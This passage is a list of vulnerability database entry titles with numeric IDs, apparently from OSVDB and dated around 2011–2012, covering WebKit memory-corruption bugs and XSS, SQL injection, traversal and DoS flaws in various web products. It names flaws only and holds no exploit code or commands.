[79981] TIBCO Multiple ActiveMatrix Products Unspecified Website Handling Information Disclosure [79979] TIBCO Spotfire Multiple Products Unspecified Website Handling Remote Information Disclosure [79975] WebKit Unspecified Drag and Drop Actions XSS [79968] WebKit Unspecified XSS (2012-0589) [79967] WebKit Unspecified XSS (2012-0588) [79966] WebKit Unspecified XSS (2012-0587) [79965] WebKit Unspecified XSS (2012-0586) [79963] WebKit 'AbstractState::execute' Function Memory Corruption [79962] WebKit Unspecified Memory Corruption (2012-0639) [79961] WebKit Unspecified Memory Corruption (2012-0638) [79960] WebKit Unspecified Memory Corruption (2012-0637) [79959] WebKit Unspecified Memory Corruption (2012-0636) [79958] WebKit Unspecified Memory Corruption (2012-0634) [79957] WebKit Custom Scrollbar Renderer Removed Use-after-free Issue [79956] WebKit Unspecified Memory Corruption (2012-0635) [79955] WebKit Unspecified Memory Corruption (2012-0633) [79954] WebKit Unspecified Memory Corruption (2012-0632) [79953] WebKit Unspecified Memory Corruption (2012-0631) [79952] WebKit Unspecified Memory Corruption (2012-0630) [79951] WebKit Unspecified Memory Corruption (2012-0629) [79950] WebKit Unspecified Memory Corruption (2012-0628) [79949] WebKit Unspecified Memory Corruption (2012-0627) [79948] WebKit Website Handling Unspecified Memory Corruption (2012-0626) [79947] WebKit Unspecified Memory Corruption (2012-0625) [79946] WebKit Unspecified Memory Corruption (2012-0624) [79945] WebKit Unspecified Memory Corruption (2012-0623) [79944] WebKit Unspecified Memory Corruption (2012-0622) [79943] WebKit Unspecified Memory Corruption (2012-0621) [79942] WebKit Unspecified Memory Corruption (2012-0620) [79941] WebKit Unspecified Memory Corruption (2012-0619) [79940] WebKit Unspecified Memory Corruption (2012-0618) [79939] WebKit Unspecified Memory Corruption (2012-0617) [79938] WebKit Unspecified Memory Corruption (2012-0616) [79937] WebKit Unspecified Memory Corruption (2012-0615) [79936] WebKit Unspecified Memory Corruption (2012-0614) [79935] WebKit Website Handling Unspecified Memory Corruption (2012-0613) [79934] WebKit Website Handling Unspecified Memory Corruption (2012-0612) [79933] WebKit Website Handling Unspecified Memory Corruption (2012-0611) [79932] WebKit Website Handling Unspecified Memory Corruption (2012-0610) [79931] WebKit Website Handling Unspecified Memory Corruption (2012-0609) [79930] WebKit Website Handling Unspecified Memory Corruption (2012-0608) [79929] WebKit Website Handling Unspecified Memory Corruption (2012-0607) [79928] WebKit Website Handling Unspecified Memory Corruption (2012-0606) [79927] WebKit Website Handling Unspecified Memory Corruption (2012-0605) [79926] WebKit Website Handling Unspecified Memory Corruption (2012-0604) [79925] WebKit Website Handling Unspecified Memory Corruption (2012-0603) [79924] WebKit Website Handling Unspecified Memory Corruption (2012-0601) [79923] WebKit Website Handling Unspecified Memory Corruption (2012-0602) [79922] WebKit Website Handling Unspecified Memory Corruption (2012-0600) [79921] WebKit Website Handling Unspecified Memory Corruption (2012-0599) [79920] WebKit Website Handling Unspecified Memory Corruption (2012-0598) [79919] WebKit Website Handling Unspecified Memory Corruption (2012-0597) [79918] WebKit Website Handling Unspecified Memory Corruption (2012-0596) [79917] WebKit Website Handling Unspecified Memory Corruption (2012-0595) [79916] WebKit Website Handling Unspecified Memory Corruption (2012-0594) [79915] WebKit Website Handling Unspecified Memory Corruption (2012-0593) [79913] WebKit Website Handling Unspecified Memory Corruption (2012-0591) [79912] WebKit Container Node Handling Use-after-free Issue [79911] WebKit Floats Removed Originating Line Handling Use-after-free Issue [79910] WebKit Inline Box Wrapper Handling Use-after-free Issue [79909] WebKit Media Content Handling Bad Cast Memory Corruption [79908] WebKit SimplifiedBackwardsTextIterator first-letter Rule Incorrect Offset Returned Out-of-bounds Read Issue [79907] WebKit 'RenderBlock::columnsBlockForSpanningElement ' Function Use-after-free Issue [79906] WebKit SVG Transform Animation Handling Memory Corruption [79905] WebKit Selection selectstart Event Handling Root Removal Use-after-free Issue [79893] WebKit Unspecified Universal XSS / History Navigation Remote Code Execution [79879] NetDecision Traffic Grapher Server Web Request Parsing Traversal Arbitrary File Access [79863] NetDecision NOCVision Server Web Request Parsing Traversal Arbitrary File Access [79852] Webform Module for Drupal components/select.inc Multiple Vector XSS [79824] XAVi X7968 webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS [79823] XAVi X7968 webconfig/wan/confirm.html/confirm pvcName Parameter XSS [79820] OpenX Admin Interface sessionID Cookie SQL Injection [79799] WebKit 'TextIterator::handleTextNodeFirstLetter' first-letter Selector Out-of-bounds Read Memory Disclosure [79797] WebKit Line Box Cloning Multi-column Layout Handling Use-after-free Arbitrary Code Execution [79796] WebKit RenderBlock::addChildToAnonymousColumnBlocks Anonymous Column Block Handling Bad Cast Memory Corruption [79795] WebKit Line Box Handling Bad Cast Memory Corruption [79787] WebKit CSS @font-face Rule List Management Use-after-free Remote Code Execution [79779] Moodle Administration Command Line Interface IP Blocking Weakness [79773] Moodle Security Key Web Service Token Disclosure [79737] BlackBerry Multiple Product WebKit Website Handling Remote Code Execution [79711] IBM WebSphere Application Server for z/OS WS-Security Enabled JAX-WS Applications Unspecified Issue [79678] Cisco Wireless LAN Controllers (WLC) WebAuth HTTP/HTTPS Packet Parsing Remote DoS [79676] Cisco Wireless LAN Controllers (WLC) Administrative Management Interface URL Parsing Remote DoS [79674] WebCalendar Event Edit Page (edit_entry_handler.php) Multiple Parameter XSS [79658] Webfolio CMS Admin User Creation CSRF [79653] NetDecision Dashboard Server Non-Existent Resource Web Request Parsing Web Directory Path Disclosure [79652] NetDecision Traffic Grapher Server Web Request GET Header Parsing NetDecision Script File Source Code Disclosure [79651] NetDecision HTTP Server Web Request Parsing Remote Overflow [79648] WebGlimpse wgarcmin.cgi Multiple Parameter XSS [79611] Koyo ECOM100 Ethernet Module Web Server Authentication Weakness [79608] Advantech/BroadWin WebAccess RPC Remote Code Execution [79600] STHS v2 Web Portal team.php team Parameter SQL Injection [79599] STHS v2 Web Portal prospect.php team Parameter SQL Injection [79598] STHS v2 Web Portal prospects.php team Parameter SQL Injection [79596] Zimbra Web Client zimbra/h/calendar view Parameter XSS [79587] Advantech/Broadwin WebAccess bwocxrun.ocx Overflow Arbitrary File Creation Code Execution [79586] Advantech/Broadwin WebAccess Arbitrary File Write Remote Code Execution [79585] Advantech/Broadwin WebAccess Unspecified ActiveX Overflow [79578] Advantech/Broadwin WebAccess GbScriptAddUp.asp Authentication Function Remote Code Execution [79577] Advantech/Broadwin WebAccess uaddUpAdmin.asp Unauthorized Admin Password Manipulation [79576] Advantech/Broadwin WebAccess Unspecified Overflow (2011-4524) [79575] Advantech/Broadwin WebAccess opcImg.asp Remote Overflow [79574] Advantech/Broadwin WebAccess Unauthorized Date/Time Syncing Modification [79570] Advantech/Broadwin WebAccess Unspecified CSRF [79569] Advantech/Broadwin WebAccess Unspecified Information Disclosure [79568] Advantech/Broadwin WebAccess bwview.asp Unspecified XSS [79567] Advantech/Broadwin WebAccess bwerrdn.asp Unspecified XSS [79566] Advantech/Broadwin WebAccess Unspecified XSS [79565] Advantech/Broadwin WebAccess Unspecified SQL Injection (2012-0244) [79563] Advantech/Broadwin WebAccess Unspecified SQL Injection (2012-0234) [79562] Advantech/Broadwin WebAccess Unspecified SQL Injection (2011-4521) [79506] Cisco Small Business SRP520 / SRP540 Series Missing Authentication Check Web Request Parsing Configuration File Upload [79460] Unity Web Player Unity 3D File Handling Remote Overflow [79435] IBM WebSphere Lombardi Edition Coach Input Control XSS [79432] SAP NetWeaver Adapter Monitor com.sap.aii.mdt.amt.web.AMTPageProcessor Servlet Adapter Monitor Information Disclosure [79430] SAP NetWeaver Application Administration (com.sap.ipc.webapp.ipc) ipc/admin/log_view.jsp logfilename Parameter Traversal Arbitrary File Access [79429] SAP NetWeaver Application Administration (com.sap.ipc.webapp.ipc) ipc/admin/log.jsp logfilename Parameter Traversal Arbitrary File Access [79338] SecureSphere Web Application Firewall Violations Table username Field XSS [79331] Web_Links Module for PHP-Nuke modules.php url Parameter SQL Injection [79295] WebKit RenderInline::splitFlow Column Style Handling Memory Corruption [79291] WebKit EventHandler::updateDragAndDrop Drag and Drop Use-after-free [79289] WebKit SubframeLoader::loadSubframe Function Subframe Loading Use-after-free Issue [79285] Google Chrome WebDatabase Worker Access Frame Closing Race Condition Use-after-free Issue [79284] WebKit WebCore/rendering/RenderCounter.cpp Counter Nodes Handling Use-after-free [79263] Microsoft SharePoint themeweb.aspx Unspecified XSS [79047] Webmin Config File Cleartext Password Local Disclosure [79046] Webmin URL NULL Byte Handling Unspecified Issue [79045] Webmin /tmp Insecure File Permission Weakness [79044] Webmin miniserv.pl Unspecified Local Password Disclosure [79043] Webmin Multiple Unspecified Issues [79042] Webmin Change Password Module Unauthorized Arbitrary Password Manipulation [79041] Webmin Samba Windows File Sharing Module /tmp/.webmin Local Password Disclosure [79039] Webmin chooser.cgi Unspecified XSS [79038] Webmin Process Listing MySQL Password Local Disclosure [79009] RabidHamster R4 miniscreenshot Script Function Web Request Parsing Remote Overflow [79008] RabidHamster R4 Boundary Error Web Request Parsing Remote Overflow [79007] RabidHamster R4 Log Entry Creation Web Request Parsing Remote Overflow [78961] Siemens SIMATIC WinCC flexible HMI Web Server Unspecified XSS (2011-4511) [78960] Siemens SIMATIC WinCC HMI Web Server Unspecified XSS (2011-4510) [78951] WebKit EventHandler::mouseMoved Function mousemove Event Handling Use-after-free Arbitrary Code Execution [78949] WebKit FrameView::forceLayoutParentViewIfNeeded Function SVG Layout Handling Use-after-free Arbitrary Code Execution [78948] WebKit Document::styleSelectorChanged Function CSS Handling Use-after-free Arbitrary Code Execution [78946] WebKit XSLTProcessor::transformToString Stylesheet Error Handling Use-after-free [78938] WebKit Column Span Handling Bad Cast Memory Corruption [78935] WebKit Aborted IndexDB Transaction Handling Use-after-free Arbitrary Code Execution [78931] CA Total Defense Suite UNC Management Web Service App_Code.dll Domain Credentials Disclosure [78890] XWiki Enterprise xwiki/bin/commentadd/Main/WebHome XWiki.XWikiComments_comment Parameter XSS [78850] Juniper Junos J-Web Component Unspecified CSRF [78835] WebsiteBaker wb/account/forgot.php HTTP-Referer XSS [78834] WebsiteBaker wb/search/index.php HTTP-Referer XSS [78822] Sphinx Mobile Web Server Blog/AboutSomething.txt comment Parameter XSS [78821] Sphinx Mobile Web Server Blog/MyFirstBlog.txt comment Parameter XSS [78815] Apple Mac OS X WebDAV Sharing Component User Authentication Handling Local Privilege Escalation [78808] Apple Mac OS X Internet Sharing Component W-Fi Configuration Reset WEB Password Removal [78804] Apple Mac OS X CFNetwork Component Web Page URL Handling Remote Information Disclosure [78792] Webservices Extension for TYPO3 Unspecified Remote Code Execution [78775] JBoss Web Surrogate Pair Character Handling Infinite Loop Remote DoS [78731] OpenEMR interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution [78729] OpenEMR interface/patient_file/encounter/view_form.php formname Parameter Traversal Local File Inclusion [78728] OpenEMR interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion [78727] OpenEMR interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion [78716] Atlassian FishEye / Crucible Webwork 2 Unspecified XSS [78704] JBoss Enterprise Web Server mod_cluster Virtual Host Registration Access Restriction Bypass [78690] WebTitan Add URL Module Unspecified XSS [78689] WebTitan Categories Add/Edit Module Unspecified XSS [78688] WebTitan Setup Time Module Unspecified XSS [78687] WebTitan Extensions / Execute Files Module Unspecified XSS [78655] ktsuss GTK Interface Subprocess GTK_Modules Variable Local Privilege Escalation [78652] Ada Web Server Hash Collision Form Parameter Parsing Remote DoS [78601] IBM WebSphere Application Server (WAS) Default Messaging Component SibRaRecoverableSiXaResource Class FFDC Log File Local Information Disclosure [78575] IBM WebSphere Application Server (WAS) IVT Install Component Unspecified XSS [78554] RSA enVision Environment Variable Web System Setup Information Disclosure [78547] WebKit contextElementForInsertion Function Adjacent HTML Insertion Memory Corruption [78546] WebKit Convex Path Handling Unitialized Value Arbitrary Code Execution [78545] WebKit 'Document::importNode' Function Elment Import Handling Use-after-free Issue [78544] WebKit DOMSelection::addRange Function Range Selection Handling Use-after-free Arbitrary Code Execution [78531] NX Web Companion nxapplet.jar Multiple Parameter Update Handling File Upload Remote Code Execution [78525] Stoneware webNetwork 6 Unspecified SQL Injection [78524] Stoneware webNetwork 6 News Articles Page Multiple Field XSS [78523] Stoneware webNetwork 6 TeamPages Page Multiple Field XSS [78522] Stoneware webNetwork 6 My Blog Page Multiple Field XSS [78521] Stoneware webNetwork 6 Authentication Hijacking CSRF [78502] AllWebMenus Plugin for WordPress wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php File Upload Remote PHP Code Execution [78497] Koyo ECOM100 Ethernet Module Web Server Unspecified Resource Exhaustion Remote DoS [78496] Koyo ECOM100 Ethernet Module Web Server Unspecified Overflow [78474] Horde Groupware Webmail Edition Horde_Form Email Verification XSS [78467] WebTitan NTP Server (Display) Module Unspecified XSS [78454] OpenNMS web/springframework/security/SecurityAuthenticationEventOnmsEventBuilder.java Username Field XSS [78430] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote Information Disclosure [78429] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote Issue [78428] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote DoS [78417] Oracle GlassFish Enterprise Server Web Container Component Unspecified Remote DoS [78405] Oracle Fusion Middleware WebCenter Content Component idc/help/user_help/wwhelp/wwhimpl/common/html/frameset.htm URI XSS [78404] Oracle Fusion Middleware WebCenter Content Component idc/idcplg Multiple Parameter XSS [78403] Oracle Fusion Middleware WebCenter Content Component idc/idcplg Multiple Parameter SQL Injection [78400] Oracle BEA WebLogic Server Web Container Component Unspecified Remote DoS [78332] IBM WebSphere Application Server (WAS) iscdeploy Script Inscure Permissions Multiple Directory Local File Manipulation [78321] IBM WebSphere Application Server (WAS) Hash Collision Form Parameter Parsing Remote DoS [78319] PHP Ringtone Website ringtones.php getparam() Function Multiple Parameter XSS [78311] NeoAxis Web Player neoaxis_web_application_win32.zip File Handling Traversal Arbitrary File Overwrite [78291] IBM WebSphere Application Server (WAS) for z/OS Web Messaging Component Unspecified XSS [78290] IBM WebSphere Application Server (WAS) for z/OS (JAX-WS) WS-Security Policy Unspecified Remote Issue [78287] Siemens Tecnomatix FactoryLink WebClient ActiveX Control Location URL Parameter Parsing Remote Code Execution [78284] IBM Web Experience Factory (WEF) Smart Refresh Dojo Multiple Element XSS [78279] 3S CoDeSys Control Service CmbWebserver.dll Module HTTP Get Request Parsing Arbitrary Directory Creation [78273] GreenBrowser Find keyword Functionality Website iframe Handling Double-free Remote Code Execution [78224] HP LaserJet P3015 Embedded Web Server Traversal Arbitrary File Access [78218] MangosWeb Enhanced mangos/index.php login Parameter SQL Injection [78214] IBM WebSphere Application Server (WAS) Community Edition Tomcat Container Multiple Parameter Request Parsing Remote DoS [78185] Lingotek Module for Drupal Page Content Manipulation Webform XSS [78181] Fill PDF Module for Drupal fillpdf.module fillpdf_merge_pdf() Function Web Request Parsing Access Restriction Bypass [78149] WebKit Animation Frame Handling Use-after-free Arbitrary Code Execution [78146] AtMail Webmail Client index.php/mail/calendar/caldavglue Title Parameter XSS [78126] BigACE Web CMS system/application/search/search.php language Parameter XSS [78125] BigACE Web CMS system/application/auth/password.php username Parameter XSS [78124] BigACE Web CMS system/application/auth/login.php Multiple Parameter XSS [78079] GoAhead WebServer Partial HTTP Request Parsing Remote DoS [78069] Akiva WebBoard /WB/Default.asp name Parameter SQL Injection Authentication Bypass [78057] Microsoft .NET Framework ASP.NET Hash Collision Web Form Post Parsing Remote DoS [78035] Splunk Web API Traversal Arbitrary File Access [78001] Websense Multiple Product explorer_wse/ws_irpt.exe Request Parsing Remote Shell Command Execution [77998] cApexWEB capexweb/servlet/capexweb.parentvalidatepassword Multiple Parameter SQL Injection [77983] phpMyAdmin Setup Interface $host Parameter XSS [77943] WebSVN revision.php path Parameter XSS [77942] WebSVN comp.php path Parameter XSS [77941] WebSVN websvn/diff.php path Parameter XSS [77903] Parallels Plesk Panel Control Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure (2011-4852) [77868] Parallels Plesk Small Business Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure [77860] Parallels Plesk Small Business Panel /smb/web/view/id/1/ user Cookie SQL Injection [77827] Parallels Plesk Panel Control Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure (2011-4740) [77813] Parallels Plesk Panel Control Panel /smb/web/view/id/1/&lt [77812] Parallels Plesk Panel Control Panel /smb/web/&lt [77785] SmarterTools SmarterStats frmGettingStarted.aspx Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure [77774] Web File Browser webFileBrowser.php file Parameter Traversal Arbitrary File Access [77746] Barracuda Web Filter Backup Test Component XSS [77745] Barracuda Web Filter NTLM User Search Component XSS [77744] Barracuda Web Filter Active Directory Component XSS [77743] Barracuda Web Filter Local User Search Component XSS [77742] Barracuda Web Filter Schedule Report Component XSS [77725] libsocialweb services/twitter/twitter--view.c Twitter Service SSL Certificate Validation MitM Weakness [77720] WebKit Mixed Direction Text Runs Handling Use-after-free Issue [77715] WebKit dom/RangeBoundaryPoint.h Range Handling Use-after-free Arbitrary Code Execution [77714] WebKit SVGResourcesCache::clientDestroyed Function SVG Filters Use-after-free Arbitrary Code Execution [77711] WebKit CSSParser::addProperty Function CSS Property Array Length Handling Buffer Overflow [77710] WebKit parseArcFlag Function SVG Parsing Out-of-bounds Read DoS Weakness [77684] Linux Kernel OMAP4 Bridge Networking Interface Network Packet Parsing Remote DoS [77665] Microsoft Time ActiveX (DATIME.DLL) Unspecified IE Web Page Handling Remote Code Execution [77645] Oxide WebServer Traversal Arbitrary File Access [77618] WebKit Cache Objects Image Handling Browsing History Disclosure [77616] Opera Web Workers Unspecified Remote DoS [77611] phpWebSite Unspecified XSS [77533] BRS WebWeaver Error Page XSS [77532] Xeneo Web Server Malformed URL Encoded Character Request Parsing Remote DoS [77502] Moodle user/action_redir Messaging Interface Username Disclosure [77500] Moodle Web Services Login Authentication Bypass [77489] Webistry index.php pid Parameter SQL Injection [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass [77426] Webform Validation Module for Drupal Multiple Unspecified XSS [77402] IBM Tivoli Netcool/Reporter CGI Web Request Parsing Remote Shell Command Execution [77389] 3S CoDeSys CmpWebServer NULL Pointer Invalid HTTP Request Parsing Remote DoS [77388] 3S CoDeSys CmpWebServer HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS [77387] 3S CoDeSys CmpWebServer 0040f480 Function URI Copying Remote Overflow [77384] Siemens SIMATIC WinCC Flexible miniweb HTTP Post Request Parsing Invalid Memory Read Remote DoS [77383] Siemens SIMATIC WinCC Flexible miniweb.exe Traversal Arbitrary File Access [77379] Schneider Electric Multiple Products Web Portal Unspecified Traversal Arbitrary File Access [77293] Linux Kernel b43 Driver Wireless Interface Frame Parsing Remote DoS [77242] Zenprise Device Manager Web Console Command Execution CSRF [77206] Apple WebObjects Unspecified XSS [77198] GoAhead WebServer goform/formTest Multiple Parameter XSS [77197] webERPphpinfo.php Direct Request Remote Information Disclosure [77196] webERP reportwriter/FormMaker.php ReportID Parameter SQL Injection [77195] webERP reportwriter/ReportMaker.php reportid Parameter SQL Injection [77194] webERP Multiple Script URI XSS [77179] InduSoft Web Studio Remote Agent Component CEServer.exe Request Authentication Weakness DLL Loading Remote Code Execution [77178] InduSoft Web Studio Remote Agent Component CEServer.exe Remove File Operation Remote Overflow [77174] IBM WebSphere MQ Control Command Local Access Restriction Bypass [77162] FreeWebshop.org ajax_save_name.php Remote Code Execution [77135] Atlassian Confluence Direct Web Remoting (DWR) Debug Mode AJAX Request Handler Information Disclosure [77091] Zingiri Web Shop Plugin for WordPress /tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php selectedDoc[] Parameter Remote PHP Code Execution [77071] Atlassian Confluence Seraph Web Framework HTTP Header Injection [77059] Atlassian Confluence WebDAV Configuration Page XSS [77047] Roundcube Webmail include/iniset.php Subject Header Parsing Remote DoS [77037] WebKit swapInNodePreservingAttributesAndChildren Function Use-after-free Arbitrary Code Execution [76973] Wiki Web Help handlers/getpage.php id Parameter SQL Injection [76971] webmaster-tips.net Flash Gallery (com_wmtpic) Component for Joomla! index.php Itemid Parameter SQL Injection [76970] IBM WebSphere MQ Stopped Queue Manager Connection Saturation Remote DoS [76965] Webform CiviCRM Integration Module for Drupal Unspecified SQL Injection [76958] PHP Labware Multiple Product Multiple stocks/interface_creator/index_long.php where_clause Parameter SQL Injection [76957] PHP Labware Multiple Product Multiple stocks/interface_creator/index_short.php where_clause Parameter SQL Injection [76956] PHP Labware Multiple Product Multiple stocks/interface_creator/index.php where_clause Parameter SQL Injection [76954] Mozilla Multiple Products WebGL GPU Memory Random Image Disclosure [76940] icedtea-web Web Browser Plugin Applet Handling Same Origin Policy Bypass [76906] CmyDocument myWebDoclist.asp x_Revised Parameter SQL Injection [76875] Serv-U Web Client Unspecified XSS [76874] IBM WebSphere MQ SSL Information Client Channel Definition Table (CCDT) File Handling Local Overflow [76873] IBM WebSphere MQ Long Group Name Parsing Local Privilege Escalation [76872] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2009-2748) [76860] IBM WebSphere Application Server (WAS) JavaServer Faces (JSF) Request Parsing Unspecified Remote File Disclosure [76847] GoAhead Webserver adduser.asp Multiple Parameter XSS [76846] GoAhead Webserver addlimit.asp url Parameter XSS [76845] GoAhead Webserver addgroup.asp group Parameter XSS [76824] Kent Web Forum Unspecified XSS (2011-4172) [76819] Cisco Adaptive Security Appliances (ASA) 5500 Series Interface Description Non-ASCII Character Parsing Local DoS [76812] Cisco TelePresence Video Communication Servers (VCS) Login Page Admin Interface User-Agent HTTP Header XSS [76804] Android Multiple HTC Devices Sense Interface HtcLoggers.apk Application android.permission.INTERNET Weakness Remote Information Disclosure [76789] Spacewalk web/modules/pxt/PXT/Handlers.pm Self Referencing Link XSS [76774] HP OpenView Network Node Manager webappmon.exe CGI Remote Overflow [76767] General Electric (GE) Proficy Historian Web Administrator Component Unspecified XSS [76675] Check Point UTM-1 Edge / Safe@Office WebUI /pub/test.html url Parameter Information Disclosure [76653] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite /websoftphone/servlet/DispLogon Multiple Parameter XSS [76652] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/RTCNavigator.jsp sessionid Parameter XSS [76651] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/CustoData.jsp openwin Parameter XSS [76650] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite /websoftphone/jsp/PhoneBookCont.jsp udatab Parameter XSS [76649] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/CBCallBackCont.jsp list Parameter XSS [76648] Toshiba TEC E-Studio Multifunction Printers Management Interface /TopAccess/ / Appending Access Restriction Bypass [76637] Trend Micro InterScan Web Security Suite setuid/setgid root /opt/trend/iwss/data/patch/bin/patchCmd Multiple Script Local Privilege Escalation [76619] WebsiteBaker /admin/media/upload.php Arbitrary File Upload [76618] WebsiteBaker /admin/users/add.php Admin Addition CSRF [76606] KaiBB inc/function.php attachment Parameter Webform File Upload SQL Injection [76602] Splunk Web Component prototype/segmentation_performance segment Parameter XSS [76601] Splunk Web Component prototype/segmentation_performance Resource Exhaustion Remote DoS [76598] IBM WebSphere Application Server (WAS) JMS Provider Authentication Property Storage Weakness [76592] OpenEMR interface/reports/chart_location_activity.php form_patient_id Parameter SQL Injection [76591] OpenEMR interface/main/calendar/index.php Multiple Parameter SQL Injection [76575] IBM WebSphere ILOG Rule Team Server content/error.jsp Unspecified XSS [76571] Cisco WebEx Player ATAS32 Component WRF File linesProcessed Value Handling Overflow [76570] Cisco WebEx Player atdl2006.dll WRF File Handling Heap Corruption Remote Overflow [76564] IBM WebSphere Application Server for z/OS Web Messaging Unspecified XSS [76563] IBM WebSphere Application Server for z/OS JAX-WS Applications WS-Security Policy Unspecified Issue [76560] Google Chrome Web Audio Overflow [76556] WebKit Custom Font Registration Handling Use-after-free Remote Code Execution [76552] WebKit HTMLPlugInImageElement::allowedToLoadFrameURL JavaScript URI Same Origin Policy Bypass [76545] WebKit Fragment Navigation History Handling URL Bar Spoofing [76532] Oracle Siebel CRM UIF Server Component User Interface Unspecified Remote Issue [76530] Oracle Siebel CRM UIF Client Component User Interface Unspecified Remote Issue [76494] Oracle WebLogic Server WLS Security Component Unspecified Local Information Disclosure [76493] Oracle WebLogic Server JMS Component Unspecified Remote Information Disclosure [76492] Oracle WebLogic Server Web Services Component Unspecified Remote Information Disclosure [76488] Oracle WebLogic Portal Unspecified Remote Issue [76476] Oracle Multiple Product Web Container Component Unspecified Remote DoS [76413] ABUS TVIP 11550/21550 IP Webcams Metacharacter Checking Weakness Arbitrary Command Execution [76403] Kent Web Forum Unspecified XSS (2011-3984) [76402] Kent Web Forum Unspecified XSS (2011-3983) [76401] Kent Web Forum Unspecified XSS (2011-3383) [76395] Microsys PROMOTIC /webdir/ URI Traversal Arbitrary File Access [76391] Apple Safari WebKit Private Browsing Mode Cookie Block Bypass [76387] WebKit Unspecified Memory Corruption (2011-3241) [76386] WebKit Unspecified Memory Corruption (2011-3239) [76385] WebKit HTMLBodyElement / StyledElement Removal Use-after-free Issues [76384] WebKit Audio Node With Media Controls Cloning Bad Cast Memory Corruption [76383] WebKit FlexBoxIterator Class Child Collapsed Visibility Handling Use-after-free Issue [76382] WebKit SVG DOM Update Position Values Handling Use-after-free Issue [76373] Apple Mac OS X QuickTime Save for Web Export MitM Weakness XSS [76367] Apple Mac OS X libsecurity Nonstandard Certificate Revocation Website / Email Handling Remote Code Execution [76363] Apple Mac OS X File Systems WebDAV Volume Handling HTTPS Server Certificate Weakness Information Disclosure [76353] WebKit DOMWindow::setLocation Inactive DOM Window Handling Universal XSS [76352] WebKit Unspecified Memory Corruption (2011-3244) [76351] WebKit Unspecified Memory Corruption (2011-3237) [76350] WebKit Unspecified Memory Corruption (2011-3236) [76349] WebKit Unspecified Memory Corruption (2011-3235) [76348] WebKit Unspecified Memory Corruption (2011-2831) [76347] WebKit Unspecified Remote Memory Corruption (2011-2820) [76346] WebKit Unspecified Memory Corruption (2011-2817) [76345] WebKit Unspecified Memory Corruption (2011-2816) [76344] WebKit Unspecified Memory Corruption (2011-2814) [76343] WebKit Document Class Associated Form Elements Use-after-free Issue [76342] WebKit Multiple Functions Out-of-bounds Read Issues [76341] WebKit Document::finishedParsing Frame Handling Use-after-free [76340] WebKit getImageData / createImageData Out-of-bounds Read Issue [76339] WebKit Document::setBody document.body Setting Use-after-free Issue [76338] WebKit XMLDocumentParser::insertErrorMessageBlock Use-after-free Issue [76337] WebKit Auto-Focus Handling Bad Cast Memory Corruption [76336] WebKit XMLDocumentParser::endElementNs / XMLDocumentParser::parseEndElement Use-after-free Issue [76335] Apple iOS UIKit Alerts Maximum Text Layout Length Limit Website tel: URI Handling Remote DoS [76334] Apple iOS Safari HTTP Content-Disposition Header Weakness Website File Handling XSS [76323] Apple iOS CoreFoundation String Tokenization Website / Email Message Handling Memory Corruption [76279] atvise webMI2ADS Negative Content-Length HTTP Header Parsing Memory Consumption Remote DoS [76278] atvise webMI2ADS shuttdown Page Access Restriction Weakness Remote DoS [76277] atvise webMI2ADS Authentication NULL Pointer De-reference Authorization HTTP Header Parsing Remote DoS [76276] atvise webMI2ADS URI Traversal Arbitrary File Access [76257] Webkit PDFs Extension for TYPO3 Unspecified Remote Command Execution [76256] Webkit PDFs Extension for TYPO3 Unspecified SQL Injection [76238] IBM WebSphere ILOG Rule Team Server teamserver/faces/home.jsp project Parameter XSS [76228] Weblinks Component for Joomla! index.php Itemid Parameter SQL Injection [76214] Microsoft .NET Framework / Silverlight Class Inheritance Restriction Web Page Handling Remote Code Execution [76190] WordPress Website Handling Clickjacking Weakness [76187] Pantech Web Browser basicConstraints Parameter SSL Certificate Spoofing Weakness [76155] openEngine openengine/cms/website.php Multiple Parameter SQL Injection [76128] radvd device-linux.c set_interface_var() Function Symlink / Traversal Local Arbitrary File Overwrite [76080] Cisco Network Admission Control (NAC) Management Interface URI Traversal Arbitrary File Access [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368) [76063] WebKit Window Prototype Named Property Confusion Same Origin Policy Bypass [76027] WebAsyst Shop-Script index.php blog_id Parameter SQL Injection [76023] Google Website Optimizer Component for Joomla! Section Names pggwob Page Tags XSS [76003] QtWeb Browser URL Display Spoofing Weakness [75956] Web Minimalist 200901 Theme for WordPresss index.php PATH_INFO XSS [75932] Ad Manager Pro website-page.php pageId Parameter SQL Injection [75905] WebsiteBaker Multiple Script Direct Request Path Disclosure [75904] WEBinsta Multiple Script Direct Request Path Disclosure [75903] WeBid Multiple Script Direct Request Path Disclosure [75902] WebCalendar Multiple Script Direct Request Path Disclosure [75898] TinyWebGallery i_frames/i_register.php Direct Request Path Disclosure [75843] Mozilla Multiple Products WebGL Test Case Unspecified Out-of-bounds Write Memory Corruption [75842] Mozilla Multiple Products WebGL ANGLE GrowAtomTable() Function Overflow [75800] Sunway ForceControl WebServer Triple Dot Traversal Arbitrary File Access [75773] Novell GroupWise WebAccess Address Book Multiple Parameter XSS [75733] 111WebCalendar Multiple Script Direct Request Path Disclosure [75726] Atlassian JIRA JIRA Bamboo Plugin Admin Interface Unspecified XSS [75721] IceWarp Mail Server server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure [75718] IBM WebSphere Application Server (WAS) Unspecified CSRF [75691] Cisco Linksys WRT54G Admin Screen Filters.asp Website Blocking by Keyword 